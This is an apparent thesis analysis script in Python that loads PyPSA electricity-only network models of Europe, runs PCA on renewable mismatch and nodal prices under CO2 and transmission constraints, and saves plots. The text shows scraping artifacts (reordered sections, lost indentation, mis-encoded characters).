# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Timeseries\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Nodal Price\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withoutProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec NP (lambda 1 & 2)")
SavePlot(fig, path, title)
#%%
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixCO2Elec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
stdMeanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_CO2:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "" #"$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec NP")
SavePlot(fig, path, titleBarCO2Elec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3], fontsize=16)
title = (file[12:-14] + " - Elec NP CO2 Evolution")
SavePlot(fig, path, title)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixTransmissionElec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_trans:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
# ----------------------- Bar plot (Elec) --------------------#
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "" #"Number of PC describing variance of network as a function of transmission constraint"
xlabel = "" #"Transmission constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec NP")
SavePlot(fig, path, titleBarTransmissionElec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3.2], fontsize=16)
title = (file[12:-14] + " - Elec NP Trans Evolution")
SavePlot(fig, path, title)
#%%
##############################################################################
##############################################################################
################################# Coherence ##################################
##############################################################################
##############################################################################
# -------------------- Coherence Plot (Elec + Heat) ---------------------#
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Path to save contribution plots
path = figurePath + "Coherence\\"
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# Prices for each country
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# Coherence between prices and mismatch
c1Elec, c2Elec, c3Elec = Coherence(mismatchElec, priceElec)
# Plot properties
title1 = "" #"Coherence 1: Electricity mismatch and nodal price"
title2 = "" #"Coherence 2: Electricity mismatch and nodal price"
title3 = "" #"Coherence 3: Electricity mismatch and nodal price"
xlabel = "Electricity Mismatch"
ylabel="Electricity Prices"
noX = 6
noY = 6
fig1 = CoherencePlot(dataMatrix=c1Elec.T, รผbertitle="", title=title1, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig2 = CoherencePlot(dataMatrix=c2Elec.T, รผbertitle="", title=title2, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig3 = CoherencePlot(dataMatrix=c3Elec.T, รผbertitle="", title=title3, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[-1,1])
SavePlot(fig1, path, title = (file[12:-3] + " - C1 elec mismatch and ENP"))
SavePlot(fig2, path, title = (file[12:-3] + " - C2 elec mismatch and ENP"))
SavePlot(fig3, path, title = (file[12:-3] + " - C3 elec mismatch and ENP"))
# Combined Plot
fig = CoherencePlotCombined(c1Elec.T, c2Elec.T, c3Elec.T, xlabel=xlabel, ylabel=ylabel)
SavePlot(fig, path, title = (file[12:-3] + " - C123 combined elec mismatch and ENP"))
# Finish timer
t1 = time.time() # End timer
total_time = round(t1-t0)
total_time_min = math.floor(total_time/60)
total_time_sec = round(total_time-(total_time_min*60))
print("\n \nThe code is now done running. It took %s min and %s sec." %(total_time_min,total_time_sec))
| 42.828922 | 213 | 0.664489 | # Import libraries
import os
import sys
import pypsa
import numpy as np
import pandas as pd
#from sympy import latex
import time
import math
# Timer
t0 = time.time() # Start a timer
# Import functions file
sys.path.append(os.path.split(os.getcwd())[0])
from functions_file import *
# Directory of file
#directory = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Data\\elec_only\\"
directory = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Data\\elec_only\\"
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Generic file name
titleFileName = file
# Figure path
#figurePath = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Figures\\elec_only\\"
figurePath = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Figures\\elec_only\\"
##############################################################################
##############################################################################
################################# Pre Analysis ###############################
##############################################################################
##############################################################################
# ------------------- Curtailment - CO2 constraints (Elec) ------------------#
# Path to save files
path = figurePath + "Pre Analysis\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_CO2, title=title, constraints=constraints, fontsize=14, ylim=[-1,20], figsize=[6, 4.5])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (CO2)"))
# --------------- Curtailment - Transmission constraints (Elec) --------------#
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_trans, title=title, constraints=constraints, fontsize=14, rotation=-17.5, ylim=[-2,60], legendLoc="upper right", figsize=[6, 4.8])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (trans)"))
##############################################################################
##############################################################################
################################### MISMATCH #################################
##############################################################################
##############################################################################
# ------- Electricity produced by technology (Elec CO2 and Trans) -----------#
# Path to save files
path = figurePath + "Mismatch\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_CO2, constraints=constraints, fontsize=14, figsize=[6,6])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (CO2)"))
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_trans, constraints=constraints, rotation=-25, fontsize=14, figsize=[6,6.3])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (trans)"))
# ------------------ Map Capacity Plots (Elec) ------------------#
# Path to save files
path = figurePath + "Mismatch\\Map Capacity\\"
# --- Elec ---
# Import network
network = pypsa.Network(directory+file)
fig1, fig2, fig3 = MapCapacityOriginal(network, titleFileName, ncol=3)
SavePlot(fig1, path, title=(file[12:-3] + " - Map Capacity Elec Generator"))
SavePlot(fig2, path, title=(file[12:-3] + " - Map Capacity Elec Storage Energy"))
SavePlot(fig3, path, title=(file[12:-3] + " - Map Capacity Elec Storage Power"))
# -------------------- Map Energy Plot (Elec) -------------------#
# Path for saving file
path = figurePath + "Mismatch\\Map Energy Distribution\\"
# Import network
network = pypsa.Network(directory+file)
# --- Elec ---
figElec = MapCapacityElectricityEnergy(network, file)
SavePlot(figElec, path, title=(file[12:-3] + " - Elec Energy Production"))
# --------------------- Map PC Plot (Elec) ----------------------#
# Path to save plots
path = figurePath + "Mismatch\\Map PC\\"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# ----------------------- Map Plot (Elec) -----------------------#
# Plot map PC for mismatch electricity
titlePlotElec = "Mismatch for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1))#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- FFT Plot (Elec) -----------------------#
# Path to save FFT plots
path = figurePath + "Mismatch\\FFT\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = (i+1))
title = (file[12:-3] + " - FFT Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Seasonal\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6,dpi=400)
title = (file[12:-3] + " - Seasonal Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Mismatch\\Timeseries\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec Mismatch (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------- Contribution plot (Elec) ------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Contribution\\"
# --- Elec ---
# Contribution
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedConElec,i+1,10,suptitle=("Electricity Contribution - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Contribution Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Response plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Response\\"
# --- Elec ---
# Response
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
for i in range(6):
fig = ConPlot(eigenValuesElec,lambdaCollectedResElec,i+1,10,suptitle=("Electricity Response - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Response Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Covariance plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Covariance\\"
# --- Elec ---
# Covariance
covMatrixElec = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec).T
for i in range(6):
fig = ConPlot(eigenValuesElec,covMatrixElec,i+1,10,suptitle=("Electricity Covariance - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Covariance Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- Combined Projection plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Projection\\"
# --- Elec ---
for i in range(6):
fig = CombConPlot(eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec, i+1, depth = 6) #, suptitle=("Electricity Projection - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Projection Plot Elec (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Mismatch\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec (lambda 1 & 2)")
SavePlot(fig, path, title)
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixCO2Elec = []
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec Mismatch")
SavePlot(fig, path, titleBarCO2Elec)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
#path = "C:/Users/jense/OneDrive - Aarhus Universitet/Dokumenter/ร
rhus Universitet/Kandidat - Civilingeniรธr/11. Semester/Master Thesis/Shared Documents/Figures/elec_only/Bar/"
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store mismatch PC componentns for each network
barMatrixTransmissionElec = []
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "Number of PC describing variance of network as a function of transmission constraint"
xlabel = "Transmission constraint"
suptitleElec = ("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec Mismatch")
SavePlot(fig, path, titleBarTransmissionElec)
# ------------------ Change in contribution and response CO2 ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
for file in filename_CO2:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
#%%
from functions_file import *
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of CO2 constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (CO2)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec response
figtitle = "Change in electricity response as a function of CO2 constraint"
